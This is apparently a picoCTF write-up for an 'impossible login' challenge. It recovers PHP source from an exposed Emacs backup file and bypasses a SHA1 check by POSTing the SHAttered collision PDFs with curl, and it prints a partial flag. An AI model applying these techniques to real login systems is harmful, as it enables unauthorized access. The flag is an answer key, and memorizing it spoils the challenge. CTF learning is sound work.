Description
ABC Bank’s “impossible” login hides a PHP backup that reveals how the server compares username and password. If the SHA1 hashes match while the raw values differ, the code returns /flag.txt.
Setup
View-source on impossibleLogin.php and append ~ to the URL (an Emacs backup) to recover the actual PHP code.
Decode the Base64 strings to learn that matching SHA1 hashes returns the flag from ../flag.txt.
curl -O https://shattered.io/static/shattered-1.pdf
curl -O https://shattered.io/static/shattered-2.pdf
curl -X POST -F "username=<shattered-1.pdf" -F "pwd=<shattered-2.pdf" http://verbal-sleep.picoctf.net:50313/impossibleLogin.php
Solution
- Step 1Recover the backupBrowsing impossibleLogin.php~ exposes the real PHP. Base64-decoded strings show the POST parameter names (username/pwd) and reveal the SHA1 equality check.
- Step 2Exploit the SHA1 collisionUse the `shattered-1.pdf`/`shattered-2.pdf` pair from Google’s SHA1 collision research. POST them as username/pwd so the raw bytes differ but SHA1 digests match, triggering `file_get_contents('../flag.txt')`.
Flag
picoCTF{w3Ll_d3sErV3d_Ch4mp_5b26...}
Any SHA1 collision pair works; the shattered.io PDFs are the canonical example.